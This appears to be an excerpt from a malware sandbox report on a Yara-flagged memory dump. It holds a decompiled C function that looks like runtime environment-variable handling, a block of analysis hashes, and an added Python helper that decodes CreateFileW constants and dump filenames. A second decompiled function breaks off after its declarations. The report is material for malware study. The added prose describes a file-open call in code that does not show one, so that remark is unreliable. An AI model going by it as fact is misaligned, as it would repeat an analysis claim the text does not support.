                                    				signed int _t308;
                                    				signed int _t310;
                                    				void* _t316;
                                    				void* _t317;
                                    				void* _t318;
                                    				void* _t320;
                                    				void* _t321;
                                    				void* _t322;
                                    				void* _t323;
                                    
                                    				_t217 = _a4;
                                    				if(_t217 != 0) {
                                    					_t286 = _t217;
                                    					_t116 = E00704F60(_t217, 0x3d);
                                    					_v16 = _t116;
                                    					_t231 = _t285;
                                    					__eflags = _t116;
                                    					if(_t116 == 0) {
                                    						L10:
                                    						 *((intOrPtr*)(E0070A504())) = 0x16;
                                    						goto L11;
                                    					} else {
                                    						__eflags = _t116 - _t217;
                                    						if(_t116 == _t217) {
                                    							goto L10;
                                    						} else {
                                    							__eflags =  *((char*)(_t116 + 1));
                                    							_t298 =  *0x73b4d0; // 0x8196a8
                                    							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
                                    							_v5 = _t120;
                                    							__eflags = _t298 -  *0x73b4dc; // 0x8196a8
                                    							if(__eflags == 0) {
                                    								L87();
                                    								_t298 = _t120;
                                    								_t120 = _v5;
                                    								_t231 = _t298;
                                    								 *0x73b4d0 = _t298;
                                    							}
                                    							_t218 = 0;
                                    							__eflags = _t298;
                                    							if(_t298 != 0) {
                                    								L21:
                                    								_t233 = _t286;
                                    								_t122 = _v16 - _t233;
                                    								_push(_t122);
                                    								_push(_t233);
                                    								L121();
                                    								_v12 = _t122;
                                    								__eflags = _t122;
                                    								if(_t122 < 0) {
                                    									L29:
                                    									__eflags = _v5 - _t218;
                                    									if(_v5 != _t218) {
                                    										goto L12;
                                    									} else {
                                    										_t123 =  ~_t122;
                                    										_v12 = _t123;
                                    										_t27 = _t123 + 2; // 0x2
                                    										_t236 = _t27;
                                    										__eflags = _t236 - _t123;
                                    										if(_t236 < _t123) {
                                    											goto L11;
                                    										} else {
                                    											__eflags = _t236 - 0x3fffffff;
                                    											if(_t236 >= 0x3fffffff) {
                                    												goto L11;
                                    											} else {
                                    												_push(4);
                                    												_push(_t236);
                                    												_t299 = E00717D55(_t298);
                                    												E007101F5(_t218);
                                    												_t320 = _t320 + 0x10;
                                    												__eflags = _t299;
                                    												if(_t299 == 0) {
                                    													goto L11;
                                    												} else {
                                    													_t237 = _v12;
                                    													_t286 = _t218;
                                    													_t126 = _a4;
                                    													 *(_t299 + _t237 * 4) = _t126;
                                    													 *(_t299 + 4 + _t237 * 4) = _t218;
                                    													goto L34;
                                    												}
                                    											}
                                    										}
                                    									}
                                    								} else {
                                    									__eflags =  *_t298 - _t218;
                                    									if( *_t298 == _t218) {
                                    										goto L29;
                                    									} else {
                                    										E007101F5( *((intOrPtr*)(_t298 + _t122 * 4)));
                                    										_t282 = _v12;
                                    										__eflags = _v5 - _t218;
                                    										if(_v5 != _t218) {
                                    											while(1) {
                                    												__eflags =  *(_t298 + _t282 * 4) - _t218;
                                    												if( *(_t298 + _t282 * 4) == _t218) {
                                    													break;
                                    												}
                                    												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
                                    												_t282 = _t282 + 1;
                                    												__eflags = _t282;
                                    											}
                                    											_push(4);
                                    											_push(_t282);
                                    											_t299 = E00717D55(_t298);
                                    											E007101F5(_t218);
                                    											_t320 = _t320 + 0x10;
                                    											_t126 = _t286;
                                    											__eflags = _t299;
                                    											if(_t299 != 0) {
                                    												L34:
                                    												 *0x73b4d0 = _t299;
                                    											}
                                    										} else {
                                    											_t126 = _a4;
                                    											_t286 = _t218;
                                    											 *(_t298 + _t282 * 4) = _t126;
                                    										}
                                    										__eflags = _a8 - _t218;
                                    										if(_a8 == _t218) {
                                    											goto L12;
                                    										} else {
                                    											_t238 = _t126;
                                    											_t283 = _t238 + 1;
                                    											do {
                                    												_t127 =  *_t238;
                                    												_t238 = _t238 + 1;
                                    												__eflags = _t127;
                                    											} while (_t127 != 0);
                                    											_v12 = _t238 - _t283 + 2;
                                    											_t300 = E0070F348(_t238 - _t283, _t238 - _t283 + 2, 1);
                                    											_pop(_t241);
                                    											__eflags = _t300;
                                    											if(_t300 == 0) {
                                    												L42:
                                    												E007101F5(_t300);
                                    												goto L12;
                                    											} else {
                                    												_t131 = E00711916(_t300, _v12, _a4);
                                    												_t321 = _t320 + 0xc;
                                    												__eflags = _t131;
                                    												if(_t131 != 0) {
                                    													_push(_t218);
                                    													_push(_t218);
                                    													_push(_t218);
                                    													_push(_t218);
                                    													_push(_t218);
                                    													E0070698A();
                                    													asm("int3");
                                    													_t316 = _t321;
                                    													_t322 = _t321 - 0xc;
                                    													_push(_t218);
                                    													_t220 = _v44;
                                    													__eflags = _t220;
                                    													if(_t220 != 0) {
                                    														_push(_t300);
                                    														_push(_t286);
                                    														_push(0x3d);
                                    														_t288 = _t220;
                                    														_t133 = E00720FF7(_t241);
                                    														_v20 = _t133;
                                    														_t244 = _t220;
                                    														__eflags = _t133;
                                    														if(_t133 == 0) {
                                    															L54:
                                    															 *((intOrPtr*)(E0070A504())) = 0x16;
                                    															goto L55;
                                    														} else {
                                    															__eflags = _t133 - _t220;
                                    															if(_t133 == _t220) {
                                    																goto L54;
                                    															} else {
                                    																_t302 =  *0x73b4d4; // 0x0
                                    																_t221 = 0;
                                    																__eflags =  *(_t133 + 2);
                                    																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
                                    																_v9 = _t246;
                                    																__eflags = _t302 -  *0x73b4d8; // 0x0
                                    																if(__eflags == 0) {
                                    																	_push(_t302);
                                    																	L104();
                                    																	_t246 = _v9;
                                    																	_t302 = _t133;
                                    																	 *0x73b4d4 = _t302;
                                    																}
                                    																__eflags = _t302;
                                    																if(_t302 != 0) {
                                    																	L64:
                                    																	_v20 = _v20 - _t288 >> 1;
                                    																	_t138 = E00717CE8(_t288, _v20 - _t288 >> 1);
                                    																	_v16 = _t138;
                                    																	__eflags = _t138;
                                    																	if(_t138 < 0) {
                                    																		L72:
                                    																		__eflags = _v9 - _t221;
                                    																		if(_v9 != _t221) {
                                    																			goto L56;
                                    																		} else {
                                    																			_t139 =  ~_t138;
                                    																			_v16 = _t139;
                                    																			_t72 = _t139 + 2; // 0x2
                                    																			_t252 = _t72;
                                    																			__eflags = _t252 - _t139;
                                    																			if(_t252 < _t139) {
                                    																				goto L55;
                                    																			} else {
                                    																				__eflags = _t252 - 0x3fffffff;
                                    																				if(_t252 >= 0x3fffffff) {
                                    																					goto L55;
                                    																				} else {
                                    																					_push(4);
                                    																					_push(_t252);
                                    																					_t303 = E00717D55(_t302);
                                    																					E007101F5(_t221);
                                    																					_t322 = _t322 + 0x10;
                                    																					__eflags = _t303;
                                    																					if(_t303 == 0) {
                                    																						goto L55;
                                    																					} else {
                                    																						_t253 = _v16;
                                    																						_t288 = _t221;
                                    																						_t142 = _v0;
                                    																						 *(_t303 + _t253 * 4) = _t142;
                                    																						 *(_t303 + 4 + _t253 * 4) = _t221;
                                    																						goto L77;
                                    																					}
                                    																				}
                                    																			}
                                    																		}
                                    																	} else {
                                    																		__eflags =  *_t302 - _t221;
                                    																		if( *_t302 == _t221) {
                                    																			goto L72;
                                    																		} else {
                                    																			E007101F5( *((intOrPtr*)(_t302 + _t138 * 4)));
                                    																			_t276 = _v16;
                                    																			__eflags = _v9 - _t221;
                                    																			if(_v9 != _t221) {
                                    																				while(1) {
                                    																					__eflags =  *(_t302 + _t276 * 4) - _t221;
                                    																					if( *(_t302 + _t276 * 4) == _t221) {
                                    																						break;
                                    																					}
                                    																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
                                    																					_t276 = _t276 + 1;
                                    																					__eflags = _t276;
                                    																				}
                                    																				_push(4);
                                    																				_push(_t276);
                                    																				_t303 = E00717D55(_t302);
                                    																				E007101F5(_t221);
                                    																				_t322 = _t322 + 0x10;
                                    																				_t142 = _t288;
                                    																				__eflags = _t303;
                                    																				if(_t303 != 0) {
                                    																					L77:
                                    																					 *0x73b4d4 = _t303;
                                    																				}
                                    																			} else {
                                    																				_t142 = _v0;
                                    																				_t288 = _t221;
                                    																				 *(_t302 + _t276 * 4) = _t142;
                                    																			}
                                    																			__eflags = _a4 - _t221;
                                    																			if(_a4 == _t221) {
                                    																				goto L56;
                                    																			} else {
                                    																				_t254 = _t142;
                                    																				_t81 = _t254 + 2; // 0x2
                                    																				_t284 = _t81;
                                    																				do {
                                    																					_t143 =  *_t254;
                                    																					_t254 = _t254 + 2;
                                    																					__eflags = _t143 - _t221;
                                    																				} while (_t143 != _t221);
                                    																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
                                    																				_v16 = _t82;
                                    																				_t304 = E0070F348(_t254 - _t284 >> 1, _t82, 2);
                                    																				_pop(_t258);
                                    																				__eflags = _t304;
                                    																				if(_t304 == 0) {
                                    																					L85:
                                    																					E007101F5(_t304);
                                    																					goto L56;
                                    																				} else {
                                    																					_t148 = E007115D4(_t304, _v16, _v0);
                                    																					_t323 = _t322 + 0xc;
                                    																					__eflags = _t148;
                                    																					if(_t148 != 0) {
                                    																						_push(_t221);
                                    																						_push(_t221);
                                    																						_push(_t221);
                                    																						_push(_t221);
                                    																						_push(_t221);
                                    																						E0070698A();
                                    																						asm("int3");
                                    																						_push(_t316);
                                    																						_t317 = _t323;
                                    																						_push(_t288);
                                    																						_t290 = _v92;
                                    																						__eflags = _t290;
                                    																						if(_t290 != 0) {
                                    																							_t260 = 0;
                                    																							_t150 = _t290;
                                    																							__eflags =  *_t290;
                                    																							if( *_t290 != 0) {
                                    																								do {
                                    																									_t150 =  &(_t150[1]);
                                    																									_t260 = _t260 + 1;
                                    																									__eflags =  *_t150;
                                    																								} while ( *_t150 != 0);
                                    																							}
                                    																							_t93 = _t260 + 1; // 0x2
                                    																							_t305 = E0070F348(_t260, _t93, 4);
                                    																							_t262 = _t304;
                                    																							__eflags = _t305;
                                    																							if(_t305 == 0) {
                                    																								L102:
                                    																								E0070F949(_t221, _t284, _t290, _t305);
                                    																								goto L103;
                                    																							} else {
                                    																								__eflags =  *_t290;
                                    																								if( *_t290 == 0) {
                                    																									L100:
                                    																									E007101F5(0);
                                    																									_t175 = _t305;
                                    																									goto L101;
                                    																								} else {
                                    																									_push(_t221);
                                    																									_t221 = _t305 - _t290;
                                    																									__eflags = _t221;
                                    																									do {
                                    																										_t271 =  *_t290;
                                    																										_t94 = _t271 + 1; // 0x5
                                    																										_t284 = _t94;
                                    																										do {
                                    																											_t176 =  *_t271;
                                    																											_t271 = _t271 + 1;
                                    																											__eflags = _t176;
                                    																										} while (_t176 != 0);
                                    																										_t262 = _t271 - _t284;
                                    																										_t95 = _t262 + 1; // 0x6
                                    																										_v16 = _t95;
                                    																										 *(_t221 + _t290) = E0070F348(_t262, _t95, 1);
                                    																										E007101F5(0);
                                    																										_t323 = _t323 + 0xc;
                                    																										__eflags =  *(_t221 + _t290);
                                    																										if( *(_t221 + _t290) == 0) {
                                    																											goto L102;
                                    																										} else {
                                    																											_t180 = E00711916( *(_t221 + _t290), _v16,  *_t290);
                                    																											_t323 = _t323 + 0xc;
                                    																											__eflags = _t180;
                                    																											if(_t180 != 0) {
                                    																												L103:
                                    																												_push(0);
                                    																												_push(0);
                                    																												_push(0);
                                    																												_push(0);
                                    																												_push(0);
                                    																												E0070698A();
                                    																												asm("int3");
                                    																												_push(_t317);
                                    																												_t318 = _t323;
                                    																												_push(_t262);
                                    																												_push(_t262);
                                    																												_push(_t290);
                                    																												_t291 = _v128;
                                    																												__eflags = _t291;
                                    																												if(_t291 != 0) {
                                    																													_push(_t221);
                                    																													_t223 = 0;
                                    																													_t156 = _t291;
                                    																													_t263 = 0;
                                    																													_v20 = 0;
                                    																													_push(_t305);
                                    																													__eflags =  *_t291;
                                    																													if( *_t291 != 0) {
                                    																														do {
                                    																															_t156 =  &(_t156[1]);
                                    																															_t263 = _t263 + 1;
                                    																															__eflags =  *_t156;
                                    																														} while ( *_t156 != 0);
                                    																													}
                                    																													_t104 = _t263 + 1; // 0x2
                                    																													_t306 = E0070F348(_t263, _t104, 4);
                                    																													__eflags = _t306;
                                    																													if(_t306 == 0) {
                                    																														L119:
                                    																														E0070F949(_t223, _t284, _t291, _t306);
                                    																														goto L120;
                                    																													} else {
                                    																														__eflags =  *_t291 - _t223;
                                    																														if( *_t291 == _t223) {
                                    																															L117:
                                    																															E007101F5(_t223);
                                    																															_t167 = _t306;
                                    																															goto L118;
                                    																														} else {
                                    																															_t223 = _t306 - _t291;
                                    																															__eflags = _t223;
                                    																															do {
                                    																																_t267 =  *_t291;
                                    																																_t105 = _t267 + 2; // 0x6
                                    																																_t284 = _t105;
                                    																																do {
                                    																																	_t168 =  *_t267;
                                    																																	_t267 = _t267 + 2;
                                    																																	__eflags = _t168 - _v20;
                                    																																} while (_t168 != _v20);
                                    																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
                                    																																_v24 = _t107;
                                    																																 *(_t223 + _t291) = E0070F348(_t267 - _t284 >> 1, _t107, 2);
                                    																																E007101F5(0);
                                    																																_t323 = _t323 + 0xc;
                                    																																__eflags =  *(_t223 + _t291);
                                    																																if( *(_t223 + _t291) == 0) {
                                    																																	goto L119;
                                    																																} else {
                                    																																	_t173 = E007115D4( *(_t223 + _t291), _v24,  *_t291);
                                    																																	_t323 = _t323 + 0xc;
                                    																																	__eflags = _t173;
                                    																																	if(_t173 != 0) {
                                    																																		L120:
                                    																																		_push(0);
                                    																																		_push(0);
                                    																																		_push(0);
                                    																																		_push(0);
                                    																																		_push(0);
                                    																																		E0070698A();
                                    																																		asm("int3");
                                    																																		_push(_t318);
                                    																																		_push(_t223);
                                    																																		_push(_t306);
                                    																																		_push(_t291);
                                    																																		_t292 =  *0x73b4d0; // 0x8196a8
                                    																																		_t307 = _t292;
                                    																																		__eflags =  *_t292;
                                    																																		if( *_t292 == 0) {
                                    																																			L127:
                                    																																			_t308 = _t307 - _t292;
                                    																																			__eflags = _t308;
                                    																																			_t310 =  ~(_t308 >> 2);
                                    																																		} else {
                                    																																			_t225 = _v8;
                                    																																			do {
                                    																																				_t163 = E007144C3(_v12,  *_t307, _t225);
                                    																																				_t323 = _t323 + 0xc;
                                    																																				__eflags = _t163;
                                    																																				if(_t163 != 0) {
                                    																																					goto L126;
                                    																																				} else {
                                    																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
                                    																																					__eflags = _t165 - 0x3d;
                                    																																					if(_t165 == 0x3d) {
                                    																																						L129:
                                    																																						_t310 = _t307 - _t292 >> 2;
                                    																																					} else {
                                    																																						__eflags = _t165;
                                    																																						if(_t165 == 0) {
                                    																																							goto L129;
                                    																																						} else {
                                    																																							goto L126;
                                    																																						}
                                    																																					}
                                    																																				}
                                    																																				goto L128;
                                    																																				L126:
                                    																																				_t307 =  &(_t307[1]);
                                    																																				__eflags =  *_t307;
                                    																																			} while ( *_t307 != 0);
                                    																																			goto L127;
                                    																																		}
                                    																																		L128:
                                    																																		return _t310;
                                    																																	} else {
                                    																																		goto L115;
                                    																																	}
                                    																																}
                                    																																goto L130;
                                    																																L115:
                                    																																_t291 = _t291 + 4;
                                    																																__eflags =  *_t291 - _t173;
                                    																															} while ( *_t291 != _t173);
                                    																															_t223 = 0;
                                    																															__eflags = 0;
                                    																															goto L117;
                                    																														}
                                    																													}
                                    																												} else {
                                    																													_t167 = 0;
                                    																													L118:
                                    																													return _t167;
                                    																												}
                                    																											} else {
                                    																												goto L98;
                                    																											}
                                    																										}
                                    																										goto L130;
                                    																										L98:
                                    																										_t290 = _t290 + 4;
                                    																										__eflags =  *_t290 - _t180;
                                    																									} while ( *_t290 != _t180);
                                    																									goto L100;
                                    																								}
                                    																							}
                                    																						} else {
                                    																							_t175 = 0;
                                    																							L101:
                                    																							return _t175;
                                    																						}
                                    																					} else {
                                    																						_t274 =  &(_t304[_v20 + 1]);
                                    																						 *(_t274 - 2) = _t148;
                                    																						asm("sbb eax, eax");
                                    																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
                                    																						__eflags = _t185;
                                    																						if(_t185 == 0) {
                                    																							_t186 = E0070A504();
                                    																							_t221 = _t221 | 0xffffffff;
                                    																							__eflags = _t221;
                                    																							 *_t186 = 0x2a;
                                    																						}
                                    																						goto L85;
                                    																					}
                                    																				}
                                    																			}
                                    																		}
                                    																	}
                                    																} else {
                                    																	_t191 =  *0x73b4d0; // 0x8196a8
                                    																	__eflags = _a4 - _t221;
                                    																	if(_a4 == _t221) {
                                    																		L58:
                                    																		__eflags = _t246;
                                    																		if(_t246 != 0) {
                                    																			goto L56;
                                    																		} else {
                                    																			__eflags = _t191;
                                    																			if(_t191 != 0) {
                                    																				L62:
                                    																				 *0x73b4d4 = E0070F348(_t246, 1, 4);
                                    																				E007101F5(_t221);
                                    																				_t322 = _t322 + 0xc;
                                    																				goto L63;
                                    																			} else {
                                    																				 *0x73b4d0 = E0070F348(_t246, 1, 4);
                                    																				E007101F5(_t221);
                                    																				_t322 = _t322 + 0xc;
                                    																				__eflags =  *0x73b4d0 - _t221; // 0x8196a8
                                    																				if(__eflags == 0) {
                                    																					goto L55;
                                    																				} else {
                                    																					_t302 =  *0x73b4d4; // 0x0
                                    																					__eflags = _t302;
                                    																					if(_t302 != 0) {
                                    																						goto L64;
                                    																					} else {
                                    																						goto L62;
                                    																					}
                                    																				}
                                    																			}
                                    																		}
                                    																	} else {
                                    																		__eflags = _t191;
                                    																		if(_t191 == 0) {
                                    																			goto L58;
                                    																		} else {
                                    																			_t196 = L0070D3FB(_t221);
                                    																			__eflags = _t196;
                                    																			if(_t196 != 0) {
                                    																				L63:
                                    																				_t302 =  *0x73b4d4; // 0x0
                                    																				__eflags = _t302;
                                    																				if(_t302 == 0) {
                                    																					L55:
                                    																					_t221 = _t220 | 0xffffffff;
                                    																					__eflags = _t221;
                                    																					L56:
                                    																					E007101F5(_t288);
                                    																					_t136 = _t221;
                                    																					goto L57;
                                    																				} else {
                                    																					goto L64;
                                    																				}
                                    																			} else {
                                    																				goto L54;
                                    																			}
                                    																		}
                                    																	}
                                    																}
                                    															}
                                    														}
                                    													} else {
                                    														_t197 = E0070A504();
                                    														 *_t197 = 0x16;
                                    														_t136 = _t197 | 0xffffffff;
                                    														L57:
                                    														return _t136;
                                    													}
                                    												} else {
                                    													_t280 = _v16 + 1 + _t300 - _a4;
                                    													asm("sbb eax, eax");
                                    													 *(_t280 - 1) = _t218;
                                    													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
                                    													__eflags = _t204;
                                    													if(_t204 == 0) {
                                    														_t205 = E0070A504();
                                    														_t218 = _t218 | 0xffffffff;
                                    														__eflags = _t218;
                                    														 *_t205 = 0x2a;
                                    													}
                                    													goto L42;
                                    												}
                                    											}
                                    										}
                                    									}
                                    								}
                                    							} else {
                                    								__eflags = _a8;
                                    								if(_a8 == 0) {
                                    									L14:
                                    									__eflags = _t120;
                                    									if(_t120 == 0) {
                                    										 *0x73b4d0 = E0070F348(_t231, 1, 4);
                                    										E007101F5(_t218);
                                    										_t298 =  *0x73b4d0; // 0x8196a8
                                    										_t320 = _t320 + 0xc;
                                    										__eflags = _t298;
                                    										if(_t298 == 0) {
                                    											goto L11;
                                    										} else {
                                    											__eflags =  *0x73b4d4 - _t218; // 0x0
                                    											if(__eflags != 0) {
                                    												goto L20;
                                    											} else {
                                    												 *0x73b4d4 = E0070F348(_t231, 1, 4);
                                    												E007101F5(_t218);
                                    												_t320 = _t320 + 0xc;
                                    												__eflags =  *0x73b4d4 - _t218; // 0x0
                                    												if(__eflags == 0) {
                                    													goto L11;
                                    												} else {
                                    													goto L19;
                                    												}
                                    											}
                                    										}
                                    									} else {
                                    										_t218 = 0;
                                    										goto L12;
                                    									}
                                    								} else {
                                    									__eflags =  *0x73b4d4 - _t218; // 0x0
                                    									if(__eflags == 0) {
                                    										goto L14;
                                    									} else {
                                    										_t214 = L0070D3F6(0);
                                    										__eflags = _t214;
                                    										if(_t214 != 0) {
                                    											L19:
                                    											_t298 =  *0x73b4d0; // 0x8196a8
                                    											L20:
                                    											__eflags = _t298;
                                    											if(_t298 == 0) {
                                    												L11:
                                    												_t218 = _t217 | 0xffffffff;
                                    												__eflags = _t218;
                                    												L12:
                                    												E007101F5(_t286);
                                    												_t119 = _t218;
                                    												goto L13;
                                    											} else {
                                    												goto L21;
                                    											}
                                    										} else {
                                    											goto L10;
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					_t215 = E0070A504();
                                    					 *_t215 = 0x16;
                                    					_t119 = _t215 | 0xffffffff;
                                    					L13:
                                    					return _t119;
                                    				}
                                    				L130:
                                    			}
                                    0x007176b6
                                    0x007176bb
                                    0x007176d2
                                    0x007176d4
                                    0x007176d9
                                    0x007176dd
                                    0x007176de
                                    0x007176e0
                                    0x00717730
                                    0x00717735
                                    0x00000000
                                    0x007176e2
                                    0x007176e2
                                    0x007176e4
                                    0x00000000
                                    0x007176e6
                                    0x007176e6
                                    0x007176ea
                                    0x007176f0
                                    0x007176f3
                                    0x007176f6
                                    0x007176fc
                                    0x007176ff
                                    0x00717704
                                    0x00717706
                                    0x00717709
                                    0x0071770a
                                    0x0071770a
                                    0x00717710
                                    0x00717712
                                    0x00717714
                                    0x007177a8
                                    0x007177ab
                                     [Address gutter column of a C-Code listing (instruction addresses 0x007176bd to 0x00717ce3; 0x00000000 marks lines without an address). The code text that belongs beside these addresses did not survive extraction.]

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                     • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                                    • String ID:
                                    • API String ID: 2719235668-0
                                    • Opcode ID: adfa6531b562be6c1d5f687c9353e1eb62dc52e48079984561ca54131180f140
                                    • Instruction ID: cb1b02d70ce6f09a720114a15a140e731824b2d692094787f355539e94d26fc2
                                    • Opcode Fuzzy Hash: adfa6531b562be6c1d5f687c9353e1eb62dc52e48079984561ca54131180f140
                                    • Instruction Fuzzy Hash: B1D12772908304EFDB29AF7C9885AEEB7B4AF01320F54416DEA45972C2E73D9984C794
                                    Uniqueness

                                    Uniqueness Score: -1.00%
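The decompiled function that follows opens a file with raw numeric arguments (CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0)), and the memory dump it was recovered from is named only by a dotted filename with a hex protection field. The helper below is an added triage example, not code from the report or from the sample: it names the Win32 constants in such a call, labels what kind of open it is, and decodes the dump filename. The Win32 values are the documented ones from winnt.h and fileapi.h; the .sdmp field layout (process.stage.id.base.protect.type) is an assumption made for this example.

```python
"""Decode raw Win32 constants from a decompiled CreateFileW call and the
protection field of a sandbox memory-dump filename.

Added triage helper; not code from the report or from the analysed sample.
Win32 values are the documented ones (winnt.h / fileapi.h). The .sdmp name
layout process.stage.id.base.protect.type is an ASSUMPTION for this example.
"""
from typing import Dict, List

GENERIC_ACCESS: Dict[int, str] = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE: Dict[int, str] = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
# dwCreationDisposition is an enum, not a bitmask
CREATION_DISPOSITION: Dict[int, str] = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS_AND_ATTRIBUTES: Dict[int, str] = {
    0x00000001: "FILE_ATTRIBUTE_READONLY", 0x00000002: "FILE_ATTRIBUTE_HIDDEN",
    0x00000004: "FILE_ATTRIBUTE_SYSTEM", 0x00000080: "FILE_ATTRIBUTE_NORMAL",
    0x00000100: "FILE_ATTRIBUTE_TEMPORARY", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
    0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN",
    0x10000000: "FILE_FLAG_RANDOM_ACCESS", 0x20000000: "FILE_FLAG_NO_BUFFERING",
    0x40000000: "FILE_FLAG_OVERLAPPED", 0x80000000: "FILE_FLAG_WRITE_THROUGH"}
PAGE_PROTECTION: Dict[int, str] = {
    0x001: "PAGE_NOACCESS", 0x002: "PAGE_READONLY", 0x004: "PAGE_READWRITE",
    0x008: "PAGE_WRITECOPY", 0x010: "PAGE_EXECUTE", 0x020: "PAGE_EXECUTE_READ",
    0x040: "PAGE_EXECUTE_READWRITE", 0x080: "PAGE_EXECUTE_WRITECOPY",
    0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
WRITABLE_AND_EXECUTABLE = {0x40, 0x80}  # the two protections that allow both


def decode_bitmask(value: int, table: Dict[int, str]) -> List[str]:
    """Split a flag word into named single-bit members (ascending bit order).
    Bits the table does not know are returned as a hex remainder, never dropped."""
    names: List[str] = []
    remaining = value
    for bit in sorted(table):
        if remaining & bit:
            names.append(table[bit])
            remaining &= ~bit
    if remaining:
        names.append(f"0x{remaining:08x}")
    return names


def decode_create_file(access: int, share: int, disposition: int, flags: int) -> Dict[str, object]:
    """Name the numeric arguments of CreateFileW(name, access, share, NULL, disposition, flags, NULL)."""
    return {
        "dwDesiredAccess": decode_bitmask(access, GENERIC_ACCESS),
        "dwShareMode": decode_bitmask(share, SHARE_MODE),  # [] means exclusive open
        "dwCreationDisposition": CREATION_DISPOSITION.get(disposition, f"unknown({disposition})"),
        "dwFlagsAndAttributes": decode_bitmask(flags, FLAGS_AND_ATTRIBUTES),
    }


def classify_open(access: int, share: int, disposition: int, flags: int) -> str:
    """Coarse intent label for a file open, checked in the order an analyst ranks them."""
    d = decode_create_file(access, share, disposition, flags)
    rights = set(d["dwDesiredAccess"])
    attrs = set(d["dwFlagsAndAttributes"])
    writes = bool(rights & {"GENERIC_WRITE", "GENERIC_ALL"})
    if "FILE_FLAG_DELETE_ON_CLOSE" in attrs:
        return "self-deleting-temp"      # staging file that leaves no artefact
    if writes and d["dwCreationDisposition"] in ("CREATE_NEW", "CREATE_ALWAYS", "TRUNCATE_EXISTING"):
        return "overwrite-or-drop"       # payload or config drop
    if writes:
        return "modify-existing"
    if "GENERIC_READ" in rights and d["dwCreationDisposition"] == "OPEN_EXISTING":
        return "read-existing"           # collection / exfiltration candidate
    return "other"


def parse_sdmp_name(name: str) -> Dict[str, object]:
    """Parse a dotted '.sdmp' dump filename. ASSUMED layout: process.stage.id.base.protect.type,
    all hex except the id, which is kept verbatim."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    parts = stem.split(".")
    if len(parts) != 6:
        raise ValueError(f"unexpected sdmp name: {name}")
    protect = int(parts[4], 16)
    return {
        "process": int(parts[0], 16),
        "stage": int(parts[1], 16),
        "id": parts[2],
        "base": int(parts[3], 16),
        "protect": decode_bitmask(protect, PAGE_PROTECTION),
        "rwx": (protect & 0xFF) in WRITABLE_AND_EXECUTABLE,
        "type": int(parts[5], 16),
    }


def rva_in_dump(address: int, region: Dict[str, object]) -> int:
    """Offset of a decompiled function address inside the dumped region."""
    base = int(region["base"])
    if address < base:
        raise ValueError(f"{address:#x} lies below dump base {base:#x}")
    return address - base


if __name__ == "__main__":
    # The call from the listing: CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0)
    print(decode_create_file(0x80000000, 1, 3, 0x80), classify_open(0x80000000, 1, 3, 0x80))
    region = parse_sdmp_name("0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp")
    print(region, hex(rva_in_dump(0x006D64A2, region)))
```

Run against the values on this page, the open resolves to GENERIC_READ / FILE_SHARE_READ / OPEN_EXISTING / FILE_ATTRIBUTE_NORMAL, i.e. a read of a file that must already exist, and the dump region at 0x006D0000 carries protection 0x40 (PAGE_EXECUTE_READWRITE), which is the writable-and-executable mapping one expects for unpacked or injected code rather than a module loaded from disk.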

                                    C-Code - Quality: 77%
                                    			E006D64A2(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
                                    				void* _v12;
                                    				union _LARGE_INTEGER _v16;
                                    				struct _OVERLAPPED* _v20;
                                    				long _v24;
                                    				long _v28;
                                    				intOrPtr _v32;
                                    				long _v36;
                                    				struct _OVERLAPPED* _v40;
                                    				union _LARGE_INTEGER* _v44;
                                    				signed int _v48;
                                    				signed int _v52;
                                    				struct %anon52 _v64;
                                    				intOrPtr _v68;
                                    				struct %anon52 _v80;
                                    				union _LARGE_INTEGER _v84;
                                    				intOrPtr _v88;
                                    				char _v112;
                                    				char _v136;
                                    				char _v160;
                                    				char _v184;
                                    				char _v208;
                                    				char _v232;
                                    				char _v256;
                                    				char _v280;
                                    				char _v304;
                                    				char _v328;
                                    				char _v352;
                                    				char _v376;
                                    				char _v400;
                                    				char _v424;
                                    				char _v448;
                                    				char _v472;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				struct %anon52 _t117;
                                    				void* _t119;
                                    				void* _t126;
                                    				long _t136;
                                    				void* _t137;
                                    				signed int _t138;
                                    				struct _OVERLAPPED* _t145;
                                    				signed int _t148;
                                    				void* _t154;
                                    				void* _t156;
                                    				void* _t157;
                                    				void* _t173;
                                    				long _t198;
                                    				signed int _t203;
                                    				void* _t216;
                                    				union _LARGE_INTEGER _t280;
                                    				intOrPtr _t281;
                                    				union _LARGE_INTEGER* _t295;
                                    				void* _t297;
                                    				void* _t301;
                                    				void* _t302;
                                    				void* _t303;
                                    				void* _t304;
